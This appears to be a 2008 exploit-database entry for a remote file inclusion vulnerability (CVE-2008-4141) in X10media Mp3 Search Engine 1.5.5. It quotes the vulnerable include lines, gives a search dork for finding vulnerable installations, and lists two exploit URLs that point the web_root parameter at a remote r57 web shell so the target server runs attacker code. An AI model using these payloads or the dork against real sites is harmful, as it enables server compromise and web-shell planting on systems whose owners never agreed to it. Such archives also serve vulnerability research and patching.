X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion
Author: THUNDER
type: webapps
platform: php
port:
date_added: 2008-09-16
date_updated:
verified: 1
codes: OSVDB-48453;CVE-2008-4141;OSVDB-48452
tags:
aliases:
screenshot_url:
application_url:
################## THUNDER #########################################################
#
#
# X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
#
# Founded by : THUNDER <t4h[at]hotmail.fr>
# Dork: "This search engine is in no way intended for illegal downloads."
#
##### Vuln Code: ###################################################################
#
# file : /includes/function_core.php
# -88.- include ($web_root."js/Mp3Player.php");
#
#-----------------------------------------------------------------
#
# file : /templates/layout_lyrics.php
# .5.- include ($web_root."includes/function_list.php");
#
###### Exploit #####################################################################
#
# http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
#
# http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?
#
#
#
###### Greets #######################################################################
#
# MoRoCcan InjEctor5 Te4m and All Hackers
#
####################################################################################
# milw0rm.com [2008-09-17]